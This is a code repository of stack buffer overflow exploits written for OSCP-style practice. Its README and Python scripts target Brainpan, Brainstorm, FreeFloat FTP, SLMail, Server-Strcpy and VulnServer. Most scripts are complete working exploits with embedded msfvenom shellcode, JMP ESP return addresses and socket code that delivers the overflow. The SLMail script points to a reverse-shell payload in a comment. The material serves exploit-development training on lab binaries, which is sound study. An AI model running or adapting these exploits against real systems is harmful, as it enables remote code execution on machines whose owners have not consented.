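├── Brainpan
    ├── brainpan.exe
    └── exploit.py
├── Brainstorm
    ├── chatserver.exe
    ├── essfunc.dll
    └── exploit.py
├── Free-Float-FTP-1.0
    ├── FTPServer.exe
    └── exploit.py
├── README.md
├── SLMail
    └── exploit.py
├── STRCPY-Server
    ├── Server-Strcpy.exe
    └── exploit.py
└── VulnServer
    └── exploit.py

/Brainpan/brainpan.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Brainpan/brainpan.exe
--------------------------------------------------------------------------------
/Brainpan/exploit.py:
--------------------------------------------------------------------------------
"""Stack overflow PoC for Brainpan (TCP 9999).

Pads up to the saved EIP, overwrites it with a JMP ESP address and lands in a
NOP sled followed by calc.exe shellcode.  Usage: python exploit.py [host] [port]
"""
import socket
import time
import sys


# msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00'
#
# bytes literal on purpose: a str literal is only correct on Python 2, and
# str.encode() on Python 3 would UTF-8-expand every byte >= 0x80, corrupting
# both the shellcode and the return address.
shellcode = (
    b"\xd9\xc8\xbe\x4a\x69\xe1\x93\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
    b"\x31\x31\x75\x18\x83\xed\xfc\x03\x75\x5e\x8b\x14\x6f\xb6\xc9"
    b"\xd7\x90\x46\xae\x5e\x75\x77\xee\x05\xfd\x27\xde\x4e\x53\xcb"
    b"\x95\x03\x40\x58\xdb\x8b\x67\xe9\x56\xea\x46\xea\xcb\xce\xc9"
    b"\x68\x16\x03\x2a\x51\xd9\x56\x2b\x96\x04\x9a\x79\x4f\x42\x09"
    b"\x6e\xe4\x1e\x92\x05\xb6\x8f\x92\xfa\x0e\xb1\xb3\xac\x05\xe8"
    b"\x13\x4e\xca\x80\x1d\x48\x0f\xac\xd4\xe3\xfb\x5a\xe7\x25\x32"
    b"\xa2\x44\x08\xfb\x51\x94\x4c\x3b\x8a\xe3\xa4\x38\x37\xf4\x72"
    b"\x43\xe3\x71\x61\xe3\x60\x21\x4d\x12\xa4\xb4\x06\x18\x01\xb2"
    b"\x41\x3c\x94\x17\xfa\x38\x1d\x96\x2d\xc9\x65\xbd\xe9\x92\x3e"
    b"\xdc\xa8\x7e\x90\xe1\xab\x21\x4d\x44\xa7\xcf\x9a\xf5\xea\x85"
    b"\x5d\x8b\x90\xeb\x5e\x93\x9a\x5b\x37\xa2\x11\x34\x40\x3b\xf0"
    b"\x71\xae\xd9\xd1\x8f\x47\x44\xb0\x32\x0a\x77\x6e\x70\x33\xf4"
    b"\x9b\x08\xc0\xe4\xe9\x0d\x8c\xa2\x02\x7f\x9d\x46\x25\x2c\x9e"
    b"\x42\x46\xb3\x0c\x0e\xa7\x56\xb5\xb5\xb7"
)

offset = 524                    # padding bytes before the saved EIP
jmp_esp = b"\xf3\x12\x17\x31"   # 0x311712f3 little-endian, overwrites EIP
nops = b"\x90" * 32             # sled so ESP need not land exactly on the shellcode
# The original repeated the literal 524 here instead of using `offset`.
payload = b"A" * offset + jmp_esp + nops + shellcode


def send_exploit(host, port, timeout=10.0):
    """Connect to host:port, read the banner and send the overflow buffer.

    Raises socket.error (including socket.timeout) on failure.  The socket is
    always closed.  Nothing is read back after the send: the target is
    expected to crash or run the shellcode.
    """
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.settimeout(timeout)   # never hang forever on a dead or wrong target
    try:
        c.connect((host, port))
        c.recv(1024)        # banner
        c.send(payload)
    finally:
        c.close()


if __name__ == "__main__":
    # Defaults are the original hard-coded 127.0.0.1:9999; optional argv
    # overrides keep the script usable against a lab VM without editing it.
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999
    try:
        send_exploit(host, port)
    except socket.error as exc:
        # The original bare `except: sys.exit()` exited 0 in silence, so a
        # failed run was indistinguishable from a successful one.
        sys.stderr.write("[-] %s:%d: %s\n" % (host, port, exc))
        sys.exit(1)
    print("[+] Exploit sent!")
    time.sleep(1)
--------------------------------------------------------------------------------
/Brainstorm/chatserver.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Brainstorm/chatserver.exe
--------------------------------------------------------------------------------
/Brainstorm/essfunc.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Brainstorm/essfunc.dll
--------------------------------------------------------------------------------
/Brainstorm/exploit.py:
--------------------------------------------------------------------------------
"""Stack overflow PoC for Brainstorm chatserver (TCP 9999).

Answers the first prompt with a username, then sends the overflow as the
message.  Usage: python exploit.py [host] [port]
"""
import socket
import sys
import time


# Fuzzing crashes at 3000 bytes
# msfvenom -p windows/exec CMD=calc.exe -f c -b '\x00'
#   (the original comment had `-b='\x00'`; msfvenom takes `-b '\x00'` like the
#   other scripts in this repo)
#
# bytes literal on purpose: on Python 3 a str would have to be encoded, and
# UTF-8 expands every byte >= 0x80, corrupting shellcode and return address.
shellcode = (
    b"\xda\xd2\xb8\x0d\x9f\xe7\x04\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
    b"\x31\x31\x46\x18\x83\xee\xfc\x03\x46\x19\x7d\x12\xf8\xc9\x03"
    b"\xdd\x01\x09\x64\x57\xe4\x38\xa4\x03\x6c\x6a\x14\x47\x20\x86"
    b"\xdf\x05\xd1\x1d\xad\x81\xd6\x96\x18\xf4\xd9\x27\x30\xc4\x78"
    b"\xab\x4b\x19\x5b\x92\x83\x6c\x9a\xd3\xfe\x9d\xce\x8c\x75\x33"
    b"\xff\xb9\xc0\x88\x74\xf1\xc5\x88\x69\x41\xe7\xb9\x3f\xda\xbe"
    b"\x19\xc1\x0f\xcb\x13\xd9\x4c\xf6\xea\x52\xa6\x8c\xec\xb2\xf7"
    b"\x6d\x42\xfb\x38\x9c\x9a\x3b\xfe\x7f\xe9\x35\xfd\x02\xea\x81"
    b"\x7c\xd9\x7f\x12\x26\xaa\xd8\xfe\xd7\x7f\xbe\x75\xdb\x34\xb4"
    b"\xd2\xff\xcb\x19\x69\xfb\x40\x9c\xbe\x8a\x13\xbb\x1a\xd7\xc0"
    b"\xa2\x3b\xbd\xa7\xdb\x5c\x1e\x17\x7e\x16\xb2\x4c\xf3\x75\xd8"
    b"\x93\x81\x03\xae\x94\x99\x0b\x9e\xfc\xa8\x80\x71\x7a\x35\x43"
    b"\x36\x74\x7f\xce\x1e\x1d\x26\x9a\x23\x40\xd9\x70\x67\x7d\x5a"
    b"\x71\x17\x7a\x42\xf0\x12\xc6\xc4\xe8\x6e\x57\xa1\x0e\xdd\x58"
    b"\xe0\x6c\x80\xca\x68\x5d\x27\x6b\x0a\xa1"
)


jmp_esp = b"\xDF\x14\x50\x62"   # 0x625014df little-endian, overwrites EIP
offset = 2012                   # padding bytes before the saved EIP
payload = b"A" * offset + jmp_esp + b"\x90" * 32 + shellcode


def send_exploit(host, port, timeout=10.0):
    """Drive the two-prompt chat protocol and send the overflow as the message.

    Raises socket.error (including socket.timeout) on failure; the socket is
    always closed.  No reply is read after the overflow is sent.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)   # never hang forever on a dead or wrong target
    try:
        s.connect((host, port))
        s.recv(1024)        # first prompt
        s.send(b"vedant")   # username; the overflow goes in the next field
        s.recv(1024)        # second prompt
        s.send(payload)
    finally:
        s.close()


if __name__ == "__main__":
    # Defaults are the original hard-coded 127.0.0.1:9999.
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999
    try:
        send_exploit(host, port)
    except socket.error as exc:
        # Narrowed from a bare `except:` and now reports the real cause.
        print("[!] Error connecting to target server! (%s:%d: %s)" % (host, port, exc))
        sys.exit(1)
    print("[!] Exploit sent!")
--------------------------------------------------------------------------------
/Free-Float-FTP-1.0/FTPServer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Free-Float-FTP-1.0/FTPServer.exe
--------------------------------------------------------------------------------
/Free-Float-FTP-1.0/exploit.py:
--------------------------------------------------------------------------------
"""Stack overflow PoC for FreeFloat FTP Server 1.0 (TCP 21).

Logs in with throwaway credentials and sends the overflow as an over-long
command line.  Usage: python exploit.py <host> [port]
"""
import socket
from time import sleep
import sys
# JMP ESP : 7724678A
# NOTE(review): a 0x77xxxxxx address is more likely to live in a Windows
# system DLL than in FTPServer.exe; if so it is subject to ASLR and will differ
# between hosts and reboots - re-verify it on the target before use.

jmp_esp = b'\x8a\x67\x24\x77'   # 0x7724678a little-endian, overwrites EIP
offset = 251                    # padding bytes before the saved EIP
nops = b'\x90' * 32

# msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00\x0a\x0d'
# (\x0a\x0d are excluded because the FTP command line is terminated by CRLF)
#
# bytes literal on purpose: encoding a str on Python 3 would UTF-8-expand every
# byte >= 0x80 and corrupt the shellcode and the return address.
shellcode = (
    b"\xda\xc2\xbd\xd6\xbe\xbe\x23\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    b"\x31\x31\x6e\x18\x83\xc6\x04\x03\x6e\xc2\x5c\x4b\xdf\x02\x22"
    b"\xb4\x20\xd2\x43\x3c\xc5\xe3\x43\x5a\x8d\x53\x74\x28\xc3\x5f"
    b"\xff\x7c\xf0\xd4\x8d\xa8\xf7\x5d\x3b\x8f\x36\x5e\x10\xf3\x59"
    b"\xdc\x6b\x20\xba\xdd\xa3\x35\xbb\x1a\xd9\xb4\xe9\xf3\x95\x6b"
    b"\x1e\x70\xe3\xb7\x95\xca\xe5\xbf\x4a\x9a\x04\x91\xdc\x91\x5e"
    b"\x31\xde\x76\xeb\x78\xf8\x9b\xd6\x33\x73\x6f\xac\xc5\x55\xbe"
    b"\x4d\x69\x98\x0f\xbc\x73\xdc\xb7\x5f\x06\x14\xc4\xe2\x11\xe3"
    b"\xb7\x38\x97\xf0\x1f\xca\x0f\xdd\x9e\x1f\xc9\x96\xac\xd4\x9d"
    b"\xf1\xb0\xeb\x72\x8a\xcc\x60\x75\x5d\x45\x32\x52\x79\x0e\xe0"
    b"\xfb\xd8\xea\x47\x03\x3a\x55\x37\xa1\x30\x7b\x2c\xd8\x1a\x11"
    b"\xb3\x6e\x21\x57\xb3\x70\x2a\xc7\xdc\x41\xa1\x88\x9b\x5d\x60"
    b"\xed\x44\xbc\xa1\x1b\xed\x19\x20\xa6\x70\x9a\x9e\xe4\x8c\x19"
    b"\x2b\x94\x6a\x01\x5e\x91\x37\x85\xb2\xeb\x28\x60\xb5\x58\x48"
    b"\xa1\xd6\x3f\xda\x29\x37\xda\x5a\xcb\x47"
)
payload = b'A' * offset + jmp_esp + nops + shellcode


def send_exploit(host, port=21, timeout=10.0):
    """Log in, send the overflow command, then try to QUIT cleanly.

    Raises socket.error (including socket.timeout) if the target cannot be
    reached or the login exchange fails.  Errors after the overflow has been
    sent are swallowed: the server is expected to have crashed by then.
    """
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.settimeout(timeout)   # bound every recv; a crashed server never answers
    try:
        c.connect((host, port))
        c.recv(1024)                    # banner
        c.send(b'USER TEST \r\n')
        c.recv(1024)
        c.send(b'PASS TEST \r\n')
        c.recv(1024)
        c.send(payload + b'\r\n')       # the over-long command line
        try:
            c.recv(1024)
            c.send(b'QUIT\r\n')
        except socket.error:
            pass    # best effort: the payload is already out
    finally:
        c.close()


if __name__ == "__main__":
    # The original hard-coded the placeholder 'iphere': name resolution failed
    # and the bare `except: sys.exit()` then exited 0 without a word.
    if len(sys.argv) < 2:
        sys.stderr.write("usage: %s <target-ip> [port]\n" % sys.argv[0])
        sys.exit(2)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 21
    try:
        send_exploit(host, port)
    except socket.error as exc:
        sys.stderr.write("[-] %s:%d: %s\n" % (host, port, exc))
        sys.exit(1)
    print("[+] Payload sent!")
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OSCP-buffer-overflow-prep
So recently, I started off with some basic exploit development. Here is a collection of all the stack overflow exploits I programmed for practicing buffer overflows!
I soon will be uploading all the exploits in this repository!

# Steps
* Finding a vulnerable entry point in the program
* Finding the offset
* Controlling EIP
* Finding Bad Characters
* Finding JMP ESP Instruction [Note: If ASLR or any other kind of protection is used in the binary, you might have to bypass them, I haven't learnt that yet]
* Generating shellcode and boom!

# Usage
* `python exploit.py <target-ip> [port]` — Brainpan and Brainstorm default to 127.0.0.1:9999; the other scripts require the target IP.
* Payloads are built from `bytes` literals so the scripts run unchanged on Python 2 and 3. When pasting msfvenom output keep it as bytes (`b"..."`): encoding a `str` on Python 3 UTF-8-expands every byte above 0x7f and silently corrupts the shellcode and the return address.
* A JMP ESP address that does not come from the vulnerable binary itself may be in an ASLR-enabled system DLL and move between hosts and reboots — re-verify it on the target before use.


# List of programs I exploited till now!
* VulnServer
* FreeFloat FTP Server 1.0
* Server-STRCPY
* Brainpan
* Brainstorm
* OSCP Buffer Overflow Practice (TryHackMe) (Haven't done all 10, 6 more to go!)
# Download Binaries
* If you want to practice buffer overflows, I have also uploaded the executable files above which you can simply download and practice!
* These binaries are intentionally exploitable: run them only inside an isolated lab VM that is not reachable from any untrusted network.
--------------------------------------------------------------------------------
/SLMail/exploit.py:
--------------------------------------------------------------------------------
"""Stack overflow PoC for SLMail POP3 (TCP 110), triggered via the PASS command.

The shellcode is NOT included: generate a reverse shell with msfvenom (see the
comment below) and paste it into `mal` as a bytes literal.
Usage: python exploit.py <host> [port]
"""
import socket
from time import sleep
import re
import sys

# Badchars : \x00\x0a\x0d

#5F 4A 35 8F FFE4 JMP ESP

#msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost= lport= -f python -b '\x00\x0a\x0d'
# `-f python` emits b"..." lines; keep them as bytes so no byte >= 0x80 gets
# UTF-8-expanded on Python 3.

mal = b"YOUR SHELLCODE HERE"
_PLACEHOLDER = b"YOUR SHELLCODE HERE"

nops = b'\x90' * 16
eip = b'\x8F\x35\x4A\x5F'   # 0x5f4a358f little-endian, overwrites EIP
offset = 2606               # padding bytes before the saved EIP
payload = b'A' * offset + eip + nops + mal


def send_exploit(host, port=110, timeout=10.0):
    """Send USER, then the overflow inside PASS.

    Raises socket.error (including socket.timeout) if the target cannot be
    reached or the USER exchange fails.  The reply to PASS is read on a
    best-effort basis because the server is expected to crash on it.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)   # bound every recv; a crashed server never answers
    try:
        s.connect((host, port))
        s.send(b"USER pepe\r\n")
        s.recv(1024)
        s.send(b"PASS " + payload + b"\r\n")
        try:
            s.recv(1024)
        except socket.error:
            pass    # best effort: the payload is already out
    finally:
        s.close()


if __name__ == "__main__":
    # The original happily sent the literal "YOUR SHELLCODE HERE" as the
    # payload; refuse to run until it has been replaced.
    if mal == _PLACEHOLDER:
        sys.stderr.write("[-] Replace the `mal` placeholder with msfvenom output first.\n")
        sys.exit(2)
    # The original hard-coded the placeholder "ipaddress" as the host.
    if len(sys.argv) < 2:
        sys.stderr.write("usage: %s <target-ip> [port]\n" % sys.argv[0])
        sys.exit(2)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 110
    try:
        send_exploit(host, port)
    except socket.error as exc:
        sys.stderr.write("[-] %s:%d: %s\n" % (host, port, exc))
        sys.exit(1)
    print("[+] Payload sent!")
--------------------------------------------------------------------------------
/STRCPY-Server/Server-Strcpy.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/STRCPY-Server/Server-Strcpy.exe
--------------------------------------------------------------------------------
/STRCPY-Server/exploit.py:
--------------------------------------------------------------------------------
"""Stack overflow PoC for Server-Strcpy (TCP 10000).

A single unsolicited send overflows the buffer.  Usage: python exploit.py <host> [port]
"""
import socket
import sys
from time import sleep
# 759E5C73 FFE4 JMP ESP
# NOTE(review): 0x759E5C73 may come from a Windows system DLL rather than from
# Server-Strcpy.exe; if so it is subject to ASLR and will differ between hosts
# and reboots - re-verify it on the target before use.

# msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00'
#
# bytes literal on purpose: encoding a str on Python 3 would UTF-8-expand every
# byte >= 0x80 and corrupt the shellcode and the return address.
shellc0de = (
    b"\xba\x87\x1e\x35\x60\xdb\xd7\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
    b"\x31\x31\x56\x13\x03\x56\x13\x83\xee\x7b\xfc\xc0\x9c\x6b\x83"
    b"\x2b\x5d\x6b\xe4\xa2\xb8\x5a\x24\xd0\xc9\xcc\x94\x92\x9c\xe0"
    b"\x5f\xf6\x34\x73\x2d\xdf\x3b\x34\x98\x39\x75\xc5\xb1\x7a\x14"
    b"\x45\xc8\xae\xf6\x74\x03\xa3\xf7\xb1\x7e\x4e\xa5\x6a\xf4\xfd"
    b"\x5a\x1f\x40\x3e\xd0\x53\x44\x46\x05\x23\x67\x67\x98\x38\x3e"
    b"\xa7\x1a\xed\x4a\xee\x04\xf2\x77\xb8\xbf\xc0\x0c\x3b\x16\x19"
    b"\xec\x90\x57\x96\x1f\xe8\x90\x10\xc0\x9f\xe8\x63\x7d\x98\x2e"
    b"\x1e\x59\x2d\xb5\xb8\x2a\x95\x11\x39\xfe\x40\xd1\x35\x4b\x06"
    b"\xbd\x59\x4a\xcb\xb5\x65\xc7\xea\x19\xec\x93\xc8\xbd\xb5\x40"
    b"\x70\xe7\x13\x26\x8d\xf7\xfc\x97\x2b\x73\x10\xc3\x41\xde\x7e"
    b"\x12\xd7\x64\xcc\x14\xe7\x66\x60\x7d\xd6\xed\xef\xfa\xe7\x27"
    b"\x54\xe4\x05\xe2\xa0\x8d\x93\x67\x09\xd0\x23\x52\x4d\xed\xa7"
    b"\x57\x2d\x0a\xb7\x1d\x28\x56\x7f\xcd\x40\xc7\xea\xf1\xf7\xe8"
    b"\x3e\x92\x96\x7a\xa2\x7b\x3d\xfb\x41\x84"
)

offset = 268                    # padding bytes before the saved EIP
jmp_esp = b'\x73\x5C\x9E\x75'   # 0x759e5c73 little-endian, overwrites EIP
nop_slides = b'\x90' * 32
payload = b'\x41' * offset + jmp_esp + nop_slides + shellc0de


def send_exploit(host, port=10000, timeout=10.0):
    """Connect and send the overflow buffer; nothing is read back.

    Raises socket.error (including socket.timeout) on failure; the socket is
    always closed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)   # never hang forever on a dead or wrong target
    try:
        s.connect((host, port))
        s.send(payload)
    finally:
        s.close()


if __name__ == "__main__":
    # The original hard-coded the placeholder 'targetiphere' as the host.
    if len(sys.argv) < 2:
        sys.stderr.write("usage: %s <target-ip> [port]\n" % sys.argv[0])
        sys.exit(2)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 10000
    try:
        send_exploit(host, port)
    except socket.error as exc:
        sys.stderr.write("[-] %s:%d: %s\n" % (host, port, exc))
        sys.exit(1)
    print("[+] Payload sent!")
--------------------------------------------------------------------------------
/VulnServer/exploit.py:
--------------------------------------------------------------------------------
"""Stack overflow PoC for vulnserver's TRUN command (TCP 9999).

Usage: python exploit.py <host> [port]
"""
import socket
import sys

#msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00'
#
# bytes literal on purpose: encoding a str on Python 3 would UTF-8-expand every
# byte >= 0x80 and corrupt the shellcode and the return address.
shellcode = (
    b"\xd9\xcd\xba\xe0\x67\xee\xc9\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
    b"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\xf4\x85\x1b\x35\x1c\xcb"
    b"\xe4\xc6\xdc\xac\x6d\x23\xed\xec\x0a\x27\x5d\xdd\x59\x65\x51"
    b"\x96\x0c\x9e\xe2\xda\x98\x91\x43\x50\xff\x9c\x54\xc9\xc3\xbf"
    b"\xd6\x10\x10\x60\xe7\xda\x65\x61\x20\x06\x87\x33\xf9\x4c\x3a"
    b"\xa4\x8e\x19\x87\x4f\xdc\x8c\x8f\xac\x94\xaf\xbe\x62\xaf\xe9"
    b"\x60\x84\x7c\x82\x28\x9e\x61\xaf\xe3\x15\x51\x5b\xf2\xff\xa8"
    b"\xa4\x59\x3e\x05\x57\xa3\x06\xa1\x88\xd6\x7e\xd2\x35\xe1\x44"
    b"\xa9\xe1\x64\x5f\x09\x61\xde\xbb\xa8\xa6\xb9\x48\xa6\x03\xcd"
    b"\x17\xaa\x92\x02\x2c\xd6\x1f\xa5\xe3\x5f\x5b\x82\x27\x04\x3f"
    b"\xab\x7e\xe0\xee\xd4\x61\x4b\x4e\x71\xe9\x61\x9b\x08\xb0\xef"
    b"\x5a\x9e\xce\x5d\x5c\xa0\xd0\xf1\x35\x91\x5b\x9e\x42\x2e\x8e"
    b"\xdb\xad\xcc\x1b\x11\x46\x49\xce\x98\x0b\x6a\x24\xde\x35\xe9"
    b"\xcd\x9e\xc1\xf1\xa7\x9b\x8e\xb5\x54\xd1\x9f\x53\x5b\x46\x9f"
    b"\x71\x38\x09\x33\x19\x91\xac\xb3\xb8\xed"
)

return_address = b"\xaf\x11\x50\x62"   # 0x625011af little-endian, overwrites EIP

offset = 2003                          # padding bytes before the saved EIP
# The original reused the name `payload` for both the raw shellcode and the
# final buffer; they are kept apart here.
payload = b"A" * offset + return_address + b"\x90" * 32 + shellcode


def send_exploit(host, port=9999, timeout=10.0):
    """Connect and send the TRUN command carrying the overflow; nothing is read back.

    Raises socket.error (including socket.timeout) on failure; the socket is
    always closed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)   # never hang forever on a dead or wrong target
    try:
        s.connect((host, port))
        s.send(b'TRUN /.:/' + payload)
    finally:
        s.close()


if __name__ == "__main__":
    # The original hard-coded the placeholder 'iphere': name resolution failed
    # and the bare `except: sys.exit()` then exited 0 without a word.
    if len(sys.argv) < 2:
        sys.stderr.write("usage: %s <target-ip> [port]\n" % sys.argv[0])
        sys.exit(2)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999
    try:
        send_exploit(host, port)
    except socket.error as exc:
        sys.stderr.write("[-] %s:%d: %s\n" % (host, port, exc))
        sys.exit(1)
    print("[+] Payload sent!")

--------------------------------------------------------------------------------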